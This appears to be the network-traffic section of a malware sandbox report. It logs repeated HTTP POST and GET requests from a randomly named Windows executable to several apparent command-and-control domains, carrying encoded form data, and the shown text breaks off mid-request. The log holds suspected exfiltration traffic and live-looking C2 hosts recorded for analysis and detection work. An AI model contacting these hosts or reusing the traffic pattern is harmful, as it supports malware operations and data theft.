                                                                                                      Oct 22, 2024 09:05:31.491347075 CEST | 10835 | OUT | POST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:32.174969912 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:31 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      12 | 192.168.2.4 | 49925 | 162.0.215.244 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:34.039135933 CEST | 456 | OUT | GET /3lre/?_XPD90E=/6Vdp+1Y21llHWroV1g1nbD9sUc5jc+T517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnGnVkV2kzsYh+hkLabXiWN1IrSGybLcPbfYA=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:34.718128920 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      date: Tue, 22 Oct 2024 07:05:33 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      13 | 192.168.2.4 | 49956 | 162.0.231.203 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:39.815593004 CEST | 712 | OUT | POST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=7DckSGPIA0EgpdxgddUjgPHdwGLjCUa0Kn5SXD2j4jMaBkv54xaJb7Se9usQjZW6l+gpa83W70STxf825rIF78U/thC6geKzxdLYw5GE7uENBS/BdSWRm5uQnqG/xBwIWBRYVWjFVB3C+SSEectB75kJSb7Axrze4z783Rlbv7Kg53ASLodPhkhUY+GySNTWOw==
                                                                                                      Oct 22, 2024 09:05:40.499548912 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:40 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      14 | 192.168.2.4 | 49972 | 162.0.231.203 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:42.357556105 CEST | 732 | OUT | POST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VUaBAr5/waJY7Se1Ota+JWhl+cPa8LW70uTxb42+c8G6sU9iBC4q+KzxdLYw4mi7qQNBDPBHzWSl5uTgqG/mRwMWBRfVTeQVCfC+Q6Eeo5Cx5kLc76t5KuViQ+a/np4wZXM8xNIaZ8YzkFnF5PGfOufV7xNPuFiGjAdpjROYelEvUg=
                                                                                                      Oct 22, 2024 09:05:43.030884027 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:42 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      15 | 192.168.2.4 | 49987 | 162.0.231.203 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:44.921472073 CEST | 10814 | OUT | POST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:45.872486115 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:45 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      16 | 192.168.2.4 | 49997 | 162.0.231.203 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:47.487998962 CEST | 449 | OUT | GET /855d/?_XPD90E=2B0ERzH0P28lwthdevcVhvj9llT5BlecEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoSssJTtiqjkpOnyuaVgJz/zdISSnDhIUOFk8Y=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:48.165419102 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:48 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      17 | 192.168.2.4 | 50023 | 103.71.154.12 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:53.368431091 CEST | 712 | OUT | POST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=WcC2F+nzEW5Oa6PkjVuopf+EHQbPxpkGsBEQ1JGlH/GvDGiRfGc155lD3+TKRXExux7z2f8rOPMJskj0XoTIcH1s1F03ZfXacVC2TstVrLZ/2den4GrLGCwu888JMmWbALqhOvsXeJhsd94cbX4ZhsXmvR//uaNpqAa049afNOBS0/PwEg6gmDCCoUgBf22bhg==
                                                                                                      Oct 22, 2024 09:05:54.302256107 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:54 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      18 | 192.168.2.4 | 50025 | 103.71.154.12 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:55.917819023 CEST | 732 | OUT | POST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HK2vDnSReHc1wplD4uTLOnEquxmA2d4rOLkJslT0WfnJcX1uu101HvXacVC2Ts44rLR/1uGn5kS5FCwh/88JImWAALq5OtI9eMlsd48cbCYa2cX8xh/rj6tgnTy4me24FqZU15CqVRb30Dmx1Tp1S1LS6ooDezNK0w1pMhu0eRihpq0=
                                                                                                      Oct 22, 2024 09:05:56.859261990 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:56 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      19 | 192.168.2.4 | 50026 | 103.71.154.12 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:58.468015909 CEST | 10814 | OUT | POST /jx6k/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      Origin: http://www.2925588.com
                                                                                                      Referer: http://www.2925588.com/jx6k/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:59.418543100 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:59 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      20 | 192.168.2.4 | 50027 | 103.71.154.12 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:01.246277094 CEST | 449 | OUT | GET /jx6k/?_XPD90E=beqWGJ7SP2hkLKuIgnm7ooabSifxwbgOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrAUgG0kgyTvD4QnbATbVShaQ+9re30AjSG1c=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:02.166224957 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:06:02 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      21 | 192.168.2.4 | 50028 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:07.387543917 CEST | 712 | OUT | POST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=8FrukiibSUwX6oduQp2ORshN8PGnoEpF8SwnkmMb/i4SjVm9nucGga2v+2bJq/em73rpL8Pj9PKSQkE7vkgOZQFlzMH1m+EdcZYliH3teY85SCJZSHuy76zk18Pr9ex4qW2UCSCCH/25MQKCyq9KWXunLbJVuc6j1/VsSUlI1bCZrXafiQsmokrYi37UDD8dcA==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      22 | 192.168.2.4 | 50029 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:09.936549902 CEST | 732 | OUT | POST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QMSj3u91/cGja2vmGbGlfex73nhL53j9POSQnQ7oXIJagF7mcGTpeEdcZYliDmAeYk5ST5ZUmutyazny8Pr3Ox8qW2mCTfZH9O5MQ6Cy+RFcXuhG7Inq9nr6u4CSHIp36a9jxXFzhNx6kPr/wygOABUHHkb1tqjnW7VtJta25Eq4c4=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      23 | 192.168.2.4 | 50030 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:12.481451988 CEST | 10814 | OUT | POST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      24 | 192.168.2.4 | 50031 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:15.028068066 CEST | 449 | OUT | GET /6o8s/?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:22.737122059 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:06:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      25 | 192.168.2.4 | 50032 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:27.799738884 CEST | 709 | OUT | POST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=n8m4awvF6TmxYzCG3rxJGf66fwNtCqVeiPcUvKWHQ+ZJL+jiw7TPKEdMGtzZQhtSDG3T6WIFhdz6gA6PxzJCYqgH57fsDgzwYNfVSUL2zWtk4xRyixxRcBYP5CJuzhKbFUxnvB4HOsqeUcUjRqdav8N8yly/DSTwOIDVl+nfpnZCvfkUfw0YXsNJq1yhQDuwTg==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      26 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:30.343477964 CEST | 729 | OUT | POST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM9JOrfix5rPLEdMJ9zYPxsQDGzh6W0FhdP6gE+PwFBNJqgJxbfuNAzwYNfVSUPMzWFk4ghykgxQCxYMvSJugxKfFUwdvDM5Oq2eUYYjR7dd6sM5vVzjSBuDOr+UrNPY0lFin5pOOBVPFsp63y7VdAT5ItCtqGI6qleKguCNpMLzUrs=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      27 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:32.889802933 CEST | 10811 | OUT | POST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      28 | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:35.431185961 CEST | 448 | OUT | GET /l5ty/?_XPD90E=q+OYZAje5TGGPxruqv4Ie4uGL0FJBdVtlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAIZom36/OATPlTemOBBCw5W17q1Y0x2snJ2U=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
